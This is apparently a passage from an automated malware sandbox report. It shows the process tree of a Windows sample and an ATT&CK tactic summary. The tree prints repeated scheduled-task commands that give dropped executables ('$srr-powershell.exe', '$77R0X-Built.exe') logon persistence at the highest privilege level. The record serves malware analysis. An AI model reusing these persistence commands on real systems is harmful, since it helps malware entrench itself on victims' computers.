"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
16⤵
- Creates scheduled task(s)
PID:4952

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
17⤵
PID:244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQpN0RDmDpq2.bat" "
16⤵
PID:1452

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
17⤵
PID:4316

C:\Windows\SysWOW64\chcp.com
chcp 65001
17⤵
PID:2288

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
17⤵
- Runs ping.exe
PID:4564

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
17⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:1056

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
18⤵
- Creates scheduled task(s)
PID:1456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
19⤵
PID:2508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W1NxpLyUDbI2.bat" "
18⤵
PID:2924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
19⤵
PID:3020

C:\Windows\SysWOW64\chcp.com
chcp 65001
19⤵
PID:4548

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
19⤵
- Runs ping.exe
PID:4392

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
19⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:4216

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
20⤵
- Creates scheduled task(s)
PID:452

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
21⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\52Ylj4TrTC5V.bat" "
20⤵
PID:4296

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
21⤵
PID:2540

C:\Windows\SysWOW64\chcp.com
chcp 65001
21⤵
PID:5064

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
21⤵
- Runs ping.exe
PID:4508

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
21⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3344

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
22⤵
- Creates scheduled task(s)
PID:2632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
23⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ltzrm9FhheS.bat" "
22⤵
PID:3356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
23⤵
PID:1456

C:\Windows\SysWOW64\chcp.com
chcp 65001
23⤵
PID:4040

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
23⤵
- Runs ping.exe
PID:3604

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
23⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:212

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
24⤵
- Creates scheduled task(s)
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\o6NcFKpkqcKR.bat" "
24⤵
PID:1928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
25⤵
PID:3644

C:\Windows\SysWOW64\chcp.com
chcp 65001
25⤵
PID:2316

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
25⤵
- Runs ping.exe
PID:2084

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
25⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2516

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
26⤵
- Creates scheduled task(s)
PID:2336

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
27⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hGpVidYJxGLv.bat" "
26⤵
PID:2108

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
27⤵
PID:3324

C:\Windows\SysWOW64\chcp.com
chcp 65001
27⤵
PID:1444

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
27⤵
- Runs ping.exe
PID:3100

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
27⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2780

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
28⤵
- Creates scheduled task(s)
PID:1440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
29⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JqteHl0WKjgs.bat" "
28⤵
PID:3356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
29⤵
PID:1128

C:\Windows\SysWOW64\chcp.com
chcp 65001
29⤵
PID:3616

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
29⤵
- Runs ping.exe
PID:4732

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
29⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2556

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
30⤵
- Creates scheduled task(s)
PID:1488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
31⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kLHApnaBrkBd.bat" "
30⤵
PID:4632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
31⤵
- Suspicious use of SetWindowsHookEx
PID:3628

C:\Windows\SysWOW64\chcp.com
chcp 65001
31⤵
PID:1452

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
31⤵
- Runs ping.exe
PID:972

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:4592

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3664

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4024

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3552

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4496

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3440

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3864

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2728

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3684

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1192

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1480

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery